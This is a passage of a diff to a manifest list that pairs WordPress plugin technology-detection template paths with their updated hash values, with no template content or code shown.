-http/technologies/wordpress/plugins/cookie-law-info.yaml:637f38065ca7f8264b1f04b4c39cbfa392731365 -http/technologies/wordpress/plugins/cookie-notice.yaml:d9aa940b4cf92bbf5f9ef0d142de5045c7f785d2 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:6f1e8fc33a90e0229177acd2ca782ee5b7b8a4af -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:a54dddbdce917724405672d5fd023de34672cd60 -http/technologies/wordpress/plugins/custom-css-js.yaml:f26594019805ad66229651d7a335b95db14ab479 -http/technologies/wordpress/plugins/custom-fonts.yaml:0ca98e5e7afcc3f9def8e01374cca402ea591172 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:74ea92c51e97673c859779456ea3c987e87b3f1d -http/technologies/wordpress/plugins/disable-comments.yaml:360339ab47c4af4d405be8523b25e233dc401f82 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c00de4d451cb6dab874c5324916023dd0796215c -http/technologies/wordpress/plugins/duplicate-page.yaml:6d9acce606c35f594fbe8d36871b1d8801b1d947 -http/technologies/wordpress/plugins/duplicate-post.yaml:4330552234c86fe105ad68f6f1b3793b1907bcd6 -http/technologies/wordpress/plugins/duplicator.yaml:91a1925e79ee14f59d6ca6d4048a3e912582c0df -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d18e7a85dacf730e8096f78427775f801e96ef74 -http/technologies/wordpress/plugins/easy-fancybox.yaml:88e9afff7a79a94b1bd8cecdf793bfe0c6b88369 +http/technologies/wordpress/plugins/cmb2.yaml:7c2819613f2069a40dce032d05b1c903a8173c09 +http/technologies/wordpress/plugins/coblocks.yaml:aa06a9740b8dacbb698090bf4694293c82726400 +http/technologies/wordpress/plugins/code-snippets.yaml:6648c0195e494ad8abac552a2e66a317a568e831 +http/technologies/wordpress/plugins/coming-soon.yaml:9b16bbd568a64c8c508866d50606244faaf3757f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:c70607da17645518448dbaa67eed08f591c8003d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:7ed088cda18ba054291d347b2bd91b7655303e71 +http/technologies/wordpress/plugins/contact-form-7.yaml:7aaa7624695c13ddba78946c73cd7eef3cac5bac +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:22f5fbf9c52404e30e9f568393420c2e18543a25 +http/technologies/wordpress/plugins/cookie-law-info.yaml:7b81432ed3bb318bbb083f238392d6034864d1d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:55d025987384043b0d384eb9b7d30533157c0c77 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:ec9f2979d75eeb04746835eeb6b3f0d84f6aa30c +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:4194b78a46088e977aa3fd03b66aea4222cf6414 +http/technologies/wordpress/plugins/custom-css-js.yaml:0375e0760a4807bb76a5b53fc6ad8aefa39a90c5 +http/technologies/wordpress/plugins/custom-fonts.yaml:605e1dab5a06f2f077db039c714c00aeb2b2c893 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:ede436798476e06fd66cd2cf8db77a1424459cf2 +http/technologies/wordpress/plugins/disable-comments.yaml:5c5bd0456961be4d946a94ba819bf4f664053015 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:7fcd9de62be80acaf16d27da52fcfd0ddacfe536 +http/technologies/wordpress/plugins/duplicate-page.yaml:4854e043e2edcf88f7ab09c7905a726872d9f395 +http/technologies/wordpress/plugins/duplicate-post.yaml:97375791990664143b71358c575bc8b3be98dcda +http/technologies/wordpress/plugins/duplicator.yaml:c666c9f81d4dc270ab065674143ccd0c5568822b +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:2869137f4ec96207e63c29a61affbd8f35b58606 +http/technologies/wordpress/plugins/easy-fancybox.yaml:c7c172cde4c1a06087458fb4e6f41307d93ebebc http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:1c6448b15ba41b41f5ba7b9d5d1194f895e06d3c -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:356e942fd1b3081796f7ee3496ce7e45fe9dbe07 -http/technologies/wordpress/plugins/elementor.yaml:c47e6f95118fa47785d7980ffdc3ef8d771a40be -http/technologies/wordpress/plugins/elementskit-lite.yaml:c6f916daed6f755afcce231de70845483bfb7be7 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ba6787109213066325b57f9a7e94866986e2ccab -http/technologies/wordpress/plugins/envato-elements.yaml:49920d4c3d983d6b087049b38b9280ca21d23694 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c7241fb9381de6256392a8d47c9780c30478e0f8 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:13c7d63576f81cb21b2b8810d3c94bc7210ff09d -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:6ed2e87467ca018c648d3db7f509f4f10ceb0408 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f77e4aeba440ea787ea49dfa5887a4820153fc66 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:67e78904fe07f5daeeb449ea85a47c41bbc4bc8d -http/technologies/wordpress/plugins/flamingo.yaml:4d3f2731a6e0bdd229fc8ddbf026e8b934c998b8 -http/technologies/wordpress/plugins/fluentform.yaml:aa0746ae7c4cc4ae3f40ed36ccea8671ba1dc530 -http/technologies/wordpress/plugins/font-awesome.yaml:8066630d6219bd795f36f1f178c6ace6b9213811 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:f34b3fcce3eefa6a05c912368402fe943b8acb19 -http/technologies/wordpress/plugins/formidable.yaml:9b1c9cb1f812222b2b019b7683763703344f6d8f -http/technologies/wordpress/plugins/forminator.yaml:75e2e7576c463685bcc136a881ff957d750fcd65 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:4408b724b589ee76e8f5fd51d52e1f29d92d1372 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:dd0616ab46fff1580a003d30231c037f290e5b54 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8fb6e5862414ce4e87352d3d29e02e09893670d1 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:9f661baa8aab517de2e49f80e2b6cbe23f8e4c84 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8018ec8677e69a104ade96e8a2cd21e148ebff71 -http/technologies/wordpress/plugins/google-site-kit.yaml:62b6ce4ca253b98d06807b68ddc3337d2b7ca800 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:86d20e3ca4c800f34018f81ba1e8e6cc8d5c2db4 -http/technologies/wordpress/plugins/gtranslate.yaml:9db904e930110cad0a0914c3e07ac089f02f0c98 -http/technologies/wordpress/plugins/gutenberg.yaml:04775a20fd07d0a16a960830b3c7fa1a55229ed7 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:988c1b228ae6a93e503955e99f9f106fe314e041 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:b4af12be6bd9d03af8c158f5a141250129f099f5 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:6b881ceed03717b762c27fc7ae3e157a9d72ae8a +http/technologies/wordpress/plugins/elementor.yaml:e8495ac57aa5ff8048ec2ce8450b449da8bf9792 +http/technologies/wordpress/plugins/elementskit-lite.yaml:8e6d2c97266a7305cb23b299568f19d7dd936efe +http/technologies/wordpress/plugins/enable-media-replace.yaml:f13cbaf6a1e736d28699203a8cf05146d4d293b2 +http/technologies/wordpress/plugins/envato-elements.yaml:b8c6be06e68623db18402b56ea9cc4da283c1c9e +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1fd38530541e506842f8a2d7b239e55124082e90 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:5081272f3af84e8e32181c3d2e6d2f6ec52dd282 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:45858838d44d4b2a03cb4bbe23ae952f53f06255 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:475d18b95e2aead06df9e997c3c0ea44b0d12c41 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:d0eab9f07d56f7647c5c7d3b20b70123705c2ea4 +http/technologies/wordpress/plugins/flamingo.yaml:f123d999764a2ab1ab327f3ec7834687b885abc5 +http/technologies/wordpress/plugins/fluentform.yaml:753d6c26691edcc30928fc8ff0ee1c4924631f49 +http/technologies/wordpress/plugins/font-awesome.yaml:90f5a62532419778808cd8af079ee8cfb200bd14 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:76bdc3a0740ef6941d1f6ac465091f2d18e42a92 +http/technologies/wordpress/plugins/formidable.yaml:ff48ef5568841e1fdf3131392cda97d4006c9a59 +http/technologies/wordpress/plugins/forminator.yaml:45044280b81dd3996cce8b2dbebfb05933b23040 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:876d3c43a3fa923be0c5cb3638035ce457799556 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:bca42f737a901c4d15da9d71aab8898fde87aa66 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:2646ef9a1b409f3bf171fdbcc8c4be04ee3a684f +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:92a689c8e68a225c1804bf1c19df8537f9f42e10 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:c1b3cf34f102a8a8014af5d1d6e55543eaa33f44 +http/technologies/wordpress/plugins/google-site-kit.yaml:567b0ffb27362a81c75275cbabf90468c7aeab33 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:0ba48fe43734d97e7cdca8dcb496d5bb8e102211 +http/technologies/wordpress/plugins/gtranslate.yaml:c45d2c5012b59d8b23c26a2526427f8323651e92 +http/technologies/wordpress/plugins/gutenberg.yaml:feca7f4603c063ba2bbcf24bbd424866dba038e0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:b450a1374ab0736f4c7d72b3f9ed2a34af4e1921 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:81d4ced3c786afd893816bfebb7140a2dc6f4558 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:71e62350350de59daf667a50a26b648084cc4ab6 -http/technologies/wordpress/plugins/header-footer.yaml:174148584b142ec038fc7a0f9176a18eb9c098db -http/technologies/wordpress/plugins/health-check.yaml:eb6631df175e58a0b119b7538d9672658c81f21a -http/technologies/wordpress/plugins/hello-dolly.yaml:a2f5e0e7641ea6debb64beeefd1a4af85d97280c -http/technologies/wordpress/plugins/host-webfonts-local.yaml:7c45ba2dc73709601db1a3869bd5bddd88384071 -http/technologies/wordpress/plugins/imagify.yaml:9c4f02fda5dc1aa5482e5fabf8d6bbf375055304 -http/technologies/wordpress/plugins/imsanity.yaml:67d29f1be228b9b14df5de942774fecedb444e65 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:6ae816e7253a38d8c0846abd90c18ca8ffea8f34 -http/technologies/wordpress/plugins/instagram-feed.yaml:1d3d97fc52d5b095a463b9ed2b9a396f7f17b97f -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:9c330ec944213e21ed8c7ab6cad1460459e81bc4 -http/technologies/wordpress/plugins/iwp-client.yaml:f88e0cf2e4152e6b902e82c361f0d131a22e00ec -http/technologies/wordpress/plugins/jetpack-boost.yaml:8b44bc711e9a20fe57090853224817b63ab0d62b -http/technologies/wordpress/plugins/jetpack.yaml:b929f76617b1123daa7fca98aee35f061d39c4e2 -http/technologies/wordpress/plugins/kadence-blocks.yaml:2511a3d7cb860f7cb14f41422c98898dc7f9894d -http/technologies/wordpress/plugins/kirki.yaml:2b3245d8cda5b94451dbec75cbeaea1af5ac0337 -http/technologies/wordpress/plugins/leadin.yaml:668bde42efcb43731a952336065f329ce61e9781 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe8bed8a150e31053cc37219d31bcc4c9f328588 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:6e97ac1e6040f16ad192e29d5845bab10d44fc27 -http/technologies/wordpress/plugins/litespeed-cache.yaml:7fa946f1b0f30d111bfe2cab883e1e7b9c6cbc1c -http/technologies/wordpress/plugins/loco-translate.yaml:ce0cf28e3d123123adfcf1622efee14f43ed39f9 -http/technologies/wordpress/plugins/loginizer.yaml:fc52596cb75f53389d233bae7f3b8be9a3fc6932 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:e78392e8deab5c845b056715a7429b4410c9d040 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:f42ccf6977c028e4fa996ed551cd70fd058a917d +http/technologies/wordpress/plugins/header-footer.yaml:f3f88d96643d6b71fb0b99ae6e02977348648405 +http/technologies/wordpress/plugins/health-check.yaml:ed88479e7bbc358d296d308dc8589d4f0b79799f +http/technologies/wordpress/plugins/hello-dolly.yaml:78475d66bdba5ccb966dba517da54803463de06e +http/technologies/wordpress/plugins/host-webfonts-local.yaml:de83b9e51558bac4c187c66b9ec6fc9a3c53efd2 +http/technologies/wordpress/plugins/imagify.yaml:7e9998fea8bcbbc7ba52f5feae107479a6c1770b +http/technologies/wordpress/plugins/imsanity.yaml:6b3f370ac9bccb7ec117f7e1e514a0004e25566e +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:94eb185cbea0da96e7366f201014d83eeb3cd461 +http/technologies/wordpress/plugins/instagram-feed.yaml:ce3cfcf1a49ff9afa08b5394df9755b1d8d203a8 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:c8fac95966954e530f92b8c19552facc7f700c42 +http/technologies/wordpress/plugins/iwp-client.yaml:b2b0ea399949d4625a781c9bdc37ae567400d9af +http/technologies/wordpress/plugins/jetpack-boost.yaml:df7cbcfd053fde38cac0471ff06a8985fa0e94ca +http/technologies/wordpress/plugins/jetpack.yaml:b74620deb0d44c1fdcb965811889a5cdc113833f +http/technologies/wordpress/plugins/kadence-blocks.yaml:41033e323e857430c951aa976728fc8d73f93ff5 +http/technologies/wordpress/plugins/kirki.yaml:066c6cd72e31ccf95d2b5174bf33cfbf210d4080 +http/technologies/wordpress/plugins/leadin.yaml:3fadf87abf776299860a11805b88818a10f03747 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:8adf660a3e31dd6a40b181939c4e47aaee2e3c75 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:bbcb277deb945189a7cdb870d6523c807ca75077 +http/technologies/wordpress/plugins/litespeed-cache.yaml:2e873ac4967a0f27a2c4c856bf473b3cb39eb7b7 +http/technologies/wordpress/plugins/loco-translate.yaml:69457275bc706617b95e18b868225e9c2d91a27d +http/technologies/wordpress/plugins/loginizer.yaml:c4376a5db052b4dd9eb27ce29c5802646fa4bd3c http/technologies/wordpress/plugins/loginpress.yaml:6bff3449a9e63df8989b80f20668802bcfa63e5e -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7519cc0e495f2044aff9cbce68c398f8e1d14d3c -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:a5bc287d1a869887101fc25381a3c1803e94ca0a -http/technologies/wordpress/plugins/mailpoet.yaml:b7ec029dede28a2d447ab52a5be42b2c980d25c3 -http/technologies/wordpress/plugins/maintenance.yaml:f619ed3b4771fad7f77822d3d1aad49e1748fd04 -http/technologies/wordpress/plugins/mainwp-child.yaml:1a06475605be6cc0112c3cdd83d376f2a47ea6fd -http/technologies/wordpress/plugins/malcare-security.yaml:5c927904f6c3289343dfbef17f5dd567461f604d -http/technologies/wordpress/plugins/megamenu.yaml:d65d78322eb3237162730a3847c4aaa7c5b56a51 -http/technologies/wordpress/plugins/members.yaml:99e5252b1eb33b67f58ab299335fa20b5ac970bc -http/technologies/wordpress/plugins/meta-box.yaml:cde63d6382ff952fcfd6d9241ef936beb46059c2 -http/technologies/wordpress/plugins/metform.yaml:336cab47e024f8f5d89145e8a27b9ea680bdb045 -http/technologies/wordpress/plugins/ml-slider.yaml:e4c2d96eb679a9e8e0b29bee148e776f119b7ede -http/technologies/wordpress/plugins/newsletter.yaml:6cdcc981691dbddeabc0398513af325721df360b -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:f20c7918be751b1caf7db027ca47d31c63131c21 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:3b2ffb8b75979c01b5a3761a69694b5deb45eb18 -http/technologies/wordpress/plugins/ninja-forms.yaml:50d338f09ac6b4d2c1d94dedd239222ba9a86514 -http/technologies/wordpress/plugins/ocean-extra.yaml:1e110fda1cf79cf650f9f820ebaafe8a2857c912 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:de9a5ae21027f63d3246a8375470f473d2044306 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:527d2f134d7e4b652378aea7d33cc41d3342e2be -http/technologies/wordpress/plugins/optinmonster.yaml:cc4d26873bb15be9a01c230bec77e319d7de9f77 -http/technologies/wordpress/plugins/otter-blocks.yaml:ab2928e5a4e8752772a901b1c68207fad99c35df -http/technologies/wordpress/plugins/password-protected.yaml:b1b706fdab4200f830c1b1beb1fbe666933592de -http/technologies/wordpress/plugins/pdf-embedder.yaml:4ed70ebb1eeee74c604da68b44aa55ece0ec99e3 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:ad7e253f978c55ee7429a593751ed4a06fa28411 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:3e7a28c4e87deda4d32f3566e3955f5ed6297deb +http/technologies/wordpress/plugins/mailpoet.yaml:ddc0e36ff16cd565e6983aa7493349bd5854df62 +http/technologies/wordpress/plugins/maintenance.yaml:7649b1cbc70c99c68243ab2e28ee1c1ffd6c83e4 +http/technologies/wordpress/plugins/mainwp-child.yaml:4e523479117284e2a48dd30085b4f309641b4225 +http/technologies/wordpress/plugins/malcare-security.yaml:7513070d48b2a2738f0952f78521ffaf18183a3d +http/technologies/wordpress/plugins/megamenu.yaml:fed9770aaa91e7a7e64303985be87b996fdd96c8 +http/technologies/wordpress/plugins/members.yaml:237d5907df04d1204911296e1278b2251ac9ce62 +http/technologies/wordpress/plugins/meta-box.yaml:cd0af027d6309a1d200cfba6e096460b71ab6f93 +http/technologies/wordpress/plugins/metform.yaml:ded37577999d8c9d90954d3231438fc80fda4d90 +http/technologies/wordpress/plugins/ml-slider.yaml:1cda7a4d91763606e1fda84b306af2e5a6503464 +http/technologies/wordpress/plugins/newsletter.yaml:9b56c7e66fbf493d16dd582ac2a93b265770d690 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:9d500665bcd6690d905a04a9acb69a43611794ae +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ce36af79c4c8167082ef162859d601f554ff2616 +http/technologies/wordpress/plugins/ninja-forms.yaml:ad607e5494e755ce990ea1bfdd751121a188b401 +http/technologies/wordpress/plugins/ocean-extra.yaml:1ccf9dce60bb0f1c67d7370f285653b7b58131e0 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:0cc6c835735504ba5717f4a79cb9a4562ee5f5d3 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ac8a3bdbca8394084ec859196008b7955dfa2714 +http/technologies/wordpress/plugins/optinmonster.yaml:ec91f078895db0715996562c67b4d3769b08b71d +http/technologies/wordpress/plugins/otter-blocks.yaml:7dedc4dfdf0cbec31478e769e44b7da02e6f5d0e +http/technologies/wordpress/plugins/password-protected.yaml:bb66962d306d1fc1646ee0e9497c59f4a69e040c +http/technologies/wordpress/plugins/pdf-embedder.yaml:69e10bf5281aa1cde8ca1d959ce5622b4cc5c5e6 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:b5b4c3bfc0fee87311cb2cc03cb6c4a82a1cafbb -http/technologies/wordpress/plugins/pixelyoursite.yaml:66fe534a71cce592ccf060695da99783350a562a -http/technologies/wordpress/plugins/polylang.yaml:b3a2c035891b45b9874107087c5711fe03224845 -http/technologies/wordpress/plugins/popup-builder.yaml:f312d028f9d71e5a9f58d6b69fb8e46c9e92b7c7 -http/technologies/wordpress/plugins/popup-maker.yaml:536d16663f1577f75e52f64e99b24f07e139d08b -http/technologies/wordpress/plugins/post-smtp.yaml:aae7092ef47fd3d4d294f9c391891551b94ef8dd -http/technologies/wordpress/plugins/post-types-order.yaml:dd6246fe3345d10e645b0e93d4cf9be73b0739de -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:6fdbd425f95d007e32f81fe2c355d0489e13194e -http/technologies/wordpress/plugins/pretty-link.yaml:1c8ed9edd4e0b0dbf5bee09b8776aa267c7a1958 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:81aa4c399baf62aa242505a0d7c91d3b3c55b76c -http/technologies/wordpress/plugins/really-simple-ssl.yaml:da0a4392e219961605c265ea4b0603998342b9ea -http/technologies/wordpress/plugins/redirection.yaml:835912399aba462b81b01c5769c7e7f997319132 -http/technologies/wordpress/plugins/redux-framework.yaml:db97b4cfe2a3c4060fdc4ad4444112ede8852c0a -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:314f5fab2d2447b5b69990ba1b7af0b6f8cfb5d3 -http/technologies/wordpress/plugins/safe-svg.yaml:c8ba235d3c680a0a171e63d8c6cc4b4ee05f2ecb -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:99d6c2206caa06465409be292eadeaa04b6e36c6 -http/technologies/wordpress/plugins/sg-cachepress.yaml:e273600393b5d512f4725afe9ca3b86f234cea87 -http/technologies/wordpress/plugins/sg-security.yaml:1cca5ff059ea7bb306bad806a263ee809e4cf84d -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a4087f1d3e523664303c81c3c9e7f0c609028b0e -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:43f5a1bed56afc9f55087b545a8e68893d556f1d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:1b67ed581b643e6bd7f5e7cdcee41004aa273954 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:355dd68a31b341a61386687b9232f8905c76ee4a +http/technologies/wordpress/plugins/pixelyoursite.yaml:c854b0b8c387955a43b9d8c46f7c69390234dbae +http/technologies/wordpress/plugins/polylang.yaml:f676ffbde0f22b387fee1ae0ec81e92ebcc73481 +http/technologies/wordpress/plugins/popup-builder.yaml:1189ab97d76688b0f4e61242fef07135644506ce +http/technologies/wordpress/plugins/popup-maker.yaml:e48dc602a5aa7a45e5f30c10b5c919eb75fd91d8 +http/technologies/wordpress/plugins/post-smtp.yaml:4fd4a58edb6d87c88f1281737f402009cb8469c4 +http/technologies/wordpress/plugins/post-types-order.yaml:3d6a85e483679f80e71de9e85bd97ae1d3feca24 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:d5bb6e3f78981ae3fa88d6ec82516c3a5b461231 +http/technologies/wordpress/plugins/pretty-link.yaml:e37feeeebf1e2a810a15ce82fb31fcaedc60c86c +http/technologies/wordpress/plugins/really-simple-captcha.yaml:37c06fc20b071d36b6fcbc5c14521193546e6b2d +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8e82636f8765083e4a41eda64d5a68449c3f8e08 +http/technologies/wordpress/plugins/redirection.yaml:5c7afd39b51fd3c9b517846955f17022c12c1c5a +http/technologies/wordpress/plugins/redux-framework.yaml:2f401d1027d85727196146251b68a59baa397b84 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:1bcd1f97614c07d600682598bfe552a8e247fe0a +http/technologies/wordpress/plugins/safe-svg.yaml:98a4773dd00b99679d86b61d7a73cfd044249a17 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:197530e8d1aa9b1fe413b894f6293a74c191a461 +http/technologies/wordpress/plugins/sg-cachepress.yaml:95dbcd8bac9c60def29fd46889a6bd237c6ac67a +http/technologies/wordpress/plugins/sg-security.yaml:fc86a3f00f890a0d812fec17d5b62dca863405f3 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:bc17bb8f57e8fbf2e081984fbc4d14d6d14de410 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:5ed1a8b8e4bb0a6135fbe774920244b865380201 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:baf71e32fabb7cb54284d5e7a2f764ec6c65d4b3 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:718231f7a7b4511567b24938f52b5adc3312364b -http/technologies/wordpress/plugins/siteorigin-panels.yaml:c981639bdd633001fd24fd2f8689e43d7639411b -http/technologies/wordpress/plugins/smart-slider-3.yaml:960b9f43fda3502029e20386a508e0005a615fd3 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:d7f156f16c4fe10d04bd8a329388634742ca19bf +http/technologies/wordpress/plugins/siteguard.yaml:776197f6dd5970c20a1471e75fb31362f769211a +http/technologies/wordpress/plugins/siteorigin-panels.yaml:cdd59bb17b51e2f13fafd7085c30eb45d974ba92 +http/technologies/wordpress/plugins/smart-slider-3.yaml:02f0fabe10d49e5de571f9bf93a25f8a93b6d970 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:10be2a683ae62cf246527299ad4a4feb35a80126 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:f5f0d43cff1e6eae0e490f3357abc752eff0f10c -http/technologies/wordpress/plugins/sucuri-scanner.yaml:24db70cad4ab8fe1628198eb0e0e0e89233f5884 -http/technologies/wordpress/plugins/svg-support.yaml:f89491ae986b66cee4f7969d3ab41d8503051d15 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:8c4e657e02733238b4a7dd5619b107228edc864e -http/technologies/wordpress/plugins/tablepress.yaml:f4f7a611f85be0316c062084b6c781463cafe7d2 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:723e0b1a554778383f77ae2125e5ee21ec673953 -http/technologies/wordpress/plugins/the-events-calendar.yaml:dbe4402946fb78fc90121fb706328fff73bcedd9 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:4a8e1df2542ed836184ada195636e91a5140ce4d +http/technologies/wordpress/plugins/sucuri-scanner.yaml:eb6ba2d621758965f14472fee4b681e6e6b0764a +http/technologies/wordpress/plugins/svg-support.yaml:52a0d73a2c3d99e77abfd870e1aa8a20b88c99e2 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:55924452aa572354da2de80973a258e0886cc744 +http/technologies/wordpress/plugins/tablepress.yaml:c3e9016bdb303bdf28c90180df74858dc69302ac +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:538fd43fac8a7cf7bdc6327f445ff2e37b7478e3 +http/technologies/wordpress/plugins/the-events-calendar.yaml:ebd29c8bf6e20e25f643be16c19c0e7407fe6de7 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:d15856e0b1bcad8aa826a0be90dd371d923bd734 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:eb919ee4cfd9dce6e96825a74a625eb676a489bc -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:05a175f52e9e7cb2f0b86aa99b6d766149669c91 -http/technologies/wordpress/plugins/under-construction-page.yaml:2c78b156d07379df9d681c9b91551ab2ad49d6b5 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:5bc182aeafb10c12dbbb372d393733fbf34d1183 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:6ad603c0486801298f57b72cf9439b68655f553f +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:a793d41464b415382747868f46766322595db4f4 +http/technologies/wordpress/plugins/under-construction-page.yaml:93e291c24b89ed4df7024085d377c54a543a58d2 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:8b519c134551702d323c3bdc98c425ce9ea7b870 -http/technologies/wordpress/plugins/use-any-font.yaml:6f300d6a8f6cda514261442eab4dce018d96164e -http/technologies/wordpress/plugins/user-role-editor.yaml:977b5a06a0d66bfdb20e8d7affc9cc015ba1c3ef -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:ce2c16f50af3d10f91775b181420d60e4ffff748 -http/technologies/wordpress/plugins/w3-total-cache.yaml:fa988e7ed1b786c198a4593930152b0ecef3a599 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:0de88c3e9d74df84cb8da9c83d276a1f8cf77384 -http/technologies/wordpress/plugins/webp-express.yaml:5c68bb282d23b65f788cfb80122a085320fc5397 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:88fa3e8cf3c26bd52de166f8da2622303bcfda19 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:5a9d12a717d2e61b31ad735a56b058a715d3cbc2 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:1a30d011d59554516518da28cdb9adc6267433a5 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:a710275e71c6c3a292afcec76233b2824b1511d9 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:87823db97e571b8bf36532a586c77e63d7b8102f -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:4b8e949ba5877f92d83a2146c5e9f428a0743838 